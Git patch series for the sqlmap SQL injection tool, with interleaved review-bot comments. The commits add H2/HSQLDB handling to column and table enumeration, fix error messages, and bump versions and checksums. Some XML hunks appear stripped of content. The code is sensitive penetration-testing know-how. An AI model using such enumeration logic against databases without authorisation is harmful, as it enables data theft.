@@ -36,7 +36,7 @@ ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py 56b79ee7acd2da19c1678250edfdafab lib/core/dicts.py -d4b3d448bcfd9f15d089fc81d38f4825 lib/core/dump.py +760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py ee7da34f4947739778a07d6c9c05ab54 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1eb1c8d9bf5f38efc0625524d7dfa8ed lib/core/settings.py +5a5c0538e7464803ea3cd2b55b98f991 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -140,10 +140,10 @@ bf98dbd666c162088f23ee697c065010 plugins/dbms/firebird/fingerprint.py d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py -271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/h2/connector.py -687005cf105ab50c62b6686866d6ef13 plugins/dbms/h2/enumeration.py +79c44d8d0dffc140d38796a32e92a66a plugins/dbms/h2/connector.py +5b99e9a60409f54a140747ce1ca0342f plugins/dbms/h2/enumeration.py b1ed542fff0aa53c54e8bc07658aeaf1 plugins/dbms/h2/filesystem.py -443bc9ac09ce180360ff5a660ac3d6ba plugins/dbms/h2/fingerprint.py +4fe530d10b74210bd045205d9318b5d6 plugins/dbms/h2/fingerprint.py 1de698e4cfddd754ffe31ea2640a481a plugins/dbms/h2/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/h2/syntax.py af746ef421cfefedc1aaa9dca1503de2 plugins/dbms/h2/takeover.py 
@@ -162,7 +162,7 @@ b182f01c2ba82aa94fbe4948383ea98d plugins/dbms/informix/fingerprint.py aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py -6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py +9c0307881fae556521bec393956664b0 plugins/dbms/maxdb/connector.py 1f3f9d4c7ec62452ed2465cd9cf50aa1 plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py @@ -213,7 +213,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -ca122ea307ed367a55b12a67a6079e74 plugins/generic/databases.py +dd0875db408080c8192c5186d2d9c246 plugins/generic/databases.py 35546acab0eea406c23b84363df4d534 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py @@ -484,4 +484,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -39173640d6807991a6b78e9bea973339 xml/queries.xml +c83a948e23219f1d101d3b3aa7eb1391 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index db9950f4b43..ee1cf5ed767 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -676,7 +676,7 @@ - + @@ -739,23 +739,18 @@ - + mirek - + - - - + + - - - - - + From 77f4fd93e7d6e728498c33a45bb5bd1f9ca05073 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Tue, 16 Oct 2018 13:27:31 +0200 Subject: [PATCH 328/428] Minor leftover --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/queries.xml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 130df4ff707..75f7fd2c8cd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.22" +VERSION = "1.2.10.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b4c536e070f..eea24bbaac2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5a5c0538e7464803ea3cd2b55b98f991 lib/core/settings.py +dd0f57aae1f982454ab4ec1ba1dcbda2 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -484,4 +484,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -c83a948e23219f1d101d3b3aa7eb1391 xml/queries.xml +67fa3c0ae62e866763be0dffebf19855 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index ee1cf5ed767..176568bf644 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -739,7 +739,7 @@ - mirek + 
From 0d2db3253903fe61f316c1040dcc52dd358ec731 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 14:47:09 +0200 Subject: [PATCH 329/428] Finalizing #3283 --- lib/core/settings.py | 2 +- plugins/generic/databases.py | 6 +++++- plugins/generic/search.py | 13 +++++++++---- txt/checksum.md5 | 8 ++++---- xml/queries.xml | 12 ++++++------ 5 files changed, 25 insertions(+), 16 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 75f7fd2c8cd..3bb0be61ae8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.23" +VERSION = "1.2.10.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index b63e57979e1..12a0b7ccad2 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py 
@@ -757,10 +757,14 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod continue for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None + elif Backend.isDbms(DBMS.H2): + query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) + query = query.replace(" ORDER BY ", "%s ORDER BY " % condQuery) + field = None elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery diff --git a/plugins/generic/search.py b/plugins/generic/search.py index e07e98bf6eb..e316c1ebc62 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -60,7 +60,7 @@ def searchDb(self): values = [] db = safeSQLIdentificatorNaming(db) - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): db = db.upper() infoMsg = "searching database" @@ -167,8 +167,9 @@ def searchTable(self): values = [] tbl = safeSQLIdentificatorNaming(tbl, True) - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2): tbl = tbl.upper() + conf.db = conf.db.upper() if conf.db else conf.db infoMsg = "searching table" if tblConsider == '1': 
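Review bot: The new `elif Backend.isDbms(DBMS.H2)` branch splices the column filter with `query.replace(" ORDER BY ", "%s ORDER BY " % condQuery)`, which rewrites every occurrence and, when the template has no ` ORDER BY `, silently drops `condQuery` so the loop would enumerate unfiltered columns; pass an explicit count and keep a fallback, `query = query.replace(" ORDER BY ", "%s ORDER BY " % condQuery, 1) if " ORDER BY " in query else query + condQuery`. The search.py hunk at -303 on the next line uses the same unbounded `replace` for `tblQuery` and would take the same count argument. getColumns continues outside the hunk.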
@@ -303,7 +304,9 @@ def searchTable(self): for index in indexRange: query = rootQuery.blind.query2 - if query.endswith("'%s')"): + if " ORDER BY " in query: + query = query.replace(" ORDER BY ", "%s ORDER BY " % (" AND %s" % tblQuery)) + elif query.endswith("'%s')"): query = query[:-1] + " AND %s)" % tblQuery else: query += " AND %s" % tblQuery @@ -387,8 +390,10 @@ def searchColumn(self): conf.db = origDb conf.tbl = origTbl - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): column = column.upper() + conf.db = conf.db.upper() if conf.db else conf.db + conf.tbl = conf.tbl.upper() if conf.tbl else conf.tbl infoMsg = "searching column" if colConsider == "1": diff --git a/txt/checksum.md5 b/txt/checksum.md5 index eea24bbaac2..1497701b96d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dd0f57aae1f982454ab4ec1ba1dcbda2 lib/core/settings.py +daf454e49b91d6bed48ec832c4b6f727 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py 
@@ -213,14 +213,14 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -dd0875db408080c8192c5186d2d9c246 plugins/generic/databases.py +3d75e831574c750ed58e24eaa562c056 plugins/generic/databases.py 35546acab0eea406c23b84363df4d534 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py -b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py +30b421f06dc98998ddc1923a9048b7fc plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py e762c77ff79e4c138145501f6fbb10cb plugins/generic/users.py @@ -484,4 +484,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -67fa3c0ae62e866763be0dffebf19855 xml/queries.xml +7bbf2a82593efffc68e8001299a5691f xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index 176568bf644..5c0e5c92169 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -770,16 +770,16 @@ - - + + - - + + - - + + From c045afd8425d6ea4edbb8b1274ad3fb5d104593a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 14:53:41 +0200 Subject: [PATCH 330/428] Minor cleanup --- lib/core/settings.py | 2 +- plugins/dbms/h2/filesystem.py | 2 +- plugins/dbms/hsqldb/filesystem.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 6 insertions(+), 6 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 3bb0be61ae8..2b339b04d26 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.24" +VERSION = "1.2.10.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/h2/filesystem.py b/plugins/dbms/h2/filesystem.py index 7542ffb60cd..b082a335ed5 100644 --- a/plugins/dbms/h2/filesystem.py +++ b/plugins/dbms/h2/filesystem.py @@ -17,5 +17,5 @@ def readFile(self, rFile): raise SqlmapUnsupportedFeatureException(errMsg) def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on H2 it is not possible to read files" + errMsg = "on H2 it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py index bdbcafef126..de9c14d9593 100644 --- a/plugins/dbms/hsqldb/filesystem.py +++ b/plugins/dbms/hsqldb/filesystem.py @@ -17,5 +17,5 @@ def readFile(self, rFile): raise SqlmapUnsupportedFeatureException(errMsg) def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on HSQLDB it is not possible to read files" + errMsg = "on HSQLDB it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1497701b96d..38b7ff1c2e3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -daf454e49b91d6bed48ec832c4b6f727 lib/core/settings.py +7ecc4951e86c97f09c53dbfb57e643e0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -142,14 +142,14 @@ c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py 79c44d8d0dffc140d38796a32e92a66a plugins/dbms/h2/connector.py 5b99e9a60409f54a140747ce1ca0342f plugins/dbms/h2/enumeration.py -b1ed542fff0aa53c54e8bc07658aeaf1 plugins/dbms/h2/filesystem.py +36522c36650afc43c1166ab68b297ecb plugins/dbms/h2/filesystem.py 4fe530d10b74210bd045205d9318b5d6 plugins/dbms/h2/fingerprint.py 1de698e4cfddd754ffe31ea2640a481a plugins/dbms/h2/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/h2/syntax.py af746ef421cfefedc1aaa9dca1503de2 plugins/dbms/h2/takeover.py 271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py -616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py +7747ad6cc12e295ba3fb4518ac083d1e plugins/dbms/hsqldb/filesystem.py b061bdbb9159c449072fde51b444f1c0 plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py From e52422900e45fbb851deaaa604dde5136bf16715 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 19:37:27 +0200 Subject: [PATCH 331/428] Fixes #3303 --- lib/core/dicts.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) 
diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 5cfb8633c75..242599e69af 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -196,7 +196,7 @@ DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), - DBMS.H2: (H2_ALIASES, None, None), + DBMS.H2: (H2_ALIASES, None, None, None), DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), } diff --git a/lib/core/settings.py b/lib/core/settings.py index 2b339b04d26..ab549d62784 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.25" +VERSION = "1.2.10.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 38b7ff1c2e3..26afa345181 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -35,7 +35,7 @@ ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -56b79ee7acd2da19c1678250edfdafab lib/core/dicts.py +ac7c070b2726d39fbac1916b1a5f92b2 lib/core/dicts.py 760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py ee7da34f4947739778a07d6c9c05ab54 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 
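Review bot: The fix adds the missing fourth element to `DBMS.H2: (H2_ALIASES, None, None, None)`, which is the right shape, but the reason the short tuple slipped through is that the positions are unnamed, so a three-element entry is indistinguishable from a correct one until something unpacks it. A comment above the dictionary naming the fields, e.g. `# (aliases, python client package, package URL, dialect name for direct connections)`, or a `collections.namedtuple` for the value, would make the next short entry visible at a glance. The dictionary definition starts outside the hunk.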
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7ecc4951e86c97f09c53dbfb57e643e0 lib/core/settings.py +ae5de169849869a08f920e52c0fadb8a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py From feb93dce4461272c4c8135b5a6c407ffd9f5bccf Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 17 Oct 2018 12:24:52 +0200 Subject: [PATCH 332/428] Update related to the #3304 --- lib/controller/checks.py | 8 -------- lib/controller/controller.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 5 insertions(+), 13 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 4ef33249b3c..d0f9a8b1018 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1117,14 +1117,6 @@ def checkDynParam(place, parameter, value): try: payload = agent.payload(place, parameter, value, getUnicode(randInt)) dynResult = Request.queryPage(payload, place, raise404=False) - - if not dynResult: - infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter) - logger.info(infoMsg) - - randInt = randomInt() - payload = agent.payload(place, parameter, value, getUnicode(randInt)) - dynResult = Request.queryPage(payload, place, raise404=False) except SqlmapConnectionException: pass diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 16395be1c54..a5f15ea3956 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py 
@@ -529,7 +529,7 @@ def start(): testSqlInj = False else: - infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter) + infoMsg = "%s parameter '%s' appears to be dynamic" % (paramType, parameter) logger.info(infoMsg) kb.testedParams.add(paramKey) diff --git a/lib/core/settings.py b/lib/core/settings.py index ab549d62784..93a2136c70e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.26" +VERSION = "1.2.10.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 26afa345181..08f04577460 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -23,8 +23,8 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -84316968d7235f53aac7e25069128725 lib/controller/checks.py -d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py +fab20cff41611d4fcb4e426e2c7704da lib/controller/checks.py +250d3cf5ea54b8fe1e91fd611b0044ab lib/controller/controller.py 97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py 
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ae5de169849869a08f920e52c0fadb8a lib/core/settings.py +72fce2cc366c9008550703643f8a6cc7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py From f52beff7c3f2d7a77202d382035c46fb66aaa13b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 22 Oct 2018 11:21:30 +0200 Subject: [PATCH 333/428] Minor patch to handle late ImportError reports --- lib/core/settings.py | 2 +- sqlmap.py | 41 +++++++++++++++++++---------------------- txt/checksum.md5 | 4 ++-- 3 files changed, 22 insertions(+), 25 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 93a2136c70e..e7cf7a45cab 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.27" +VERSION = "1.2.10.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 3f749d23fbd..c8b9fc81f17 100755 --- a/sqlmap.py +++ b/sqlmap.py 
@@ -234,60 +234,65 @@ def main(): dataToStdout(excMsg) raise SystemExit + elif "ImportError" in excMsg: + errMsg = "invalid runtime environment ('%s')" % excMsg.split("ImportError: ")[-1].strip() + logger.critical(errMsg) + raise SystemExit + elif "MemoryError" in excMsg: errMsg = "memory exhaustion detected" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): errMsg = "no space left on output device" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "Violation of BIDI" in excMsg: errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " errMsg += "(Reference: 
https://github.com/PyMySQL/PyMySQL/issues/700)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7.x. Please update accordingly " errMsg += "(Reference: https://bugs.python.org/issue8104)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "can't start new thread" in excMsg: @@ -295,34 +300,26 @@ def main(): errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): errMsg = "there has been a problem in enumeration. " errMsg += "Because of a considerable chance of false-positive case " errMsg += "you are advised to rerun with switch '--flush-session'" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") errMsg += ". Please delete .pyc files on your system to fix the problem" - logger.error(errMsg) - raise SystemExit - - elif "url = url.strip()" in excMsg: - dataToStdout(excMsg) - print - errMsg = "please contact 'miroslav@sqlmap.org' with details for this issue " - errMsg += "as he is trying to reproduce it for long time" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif kb.get("dumpKeyboardInterrupt"): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 08f04577460..cf5220d06ad 100644 
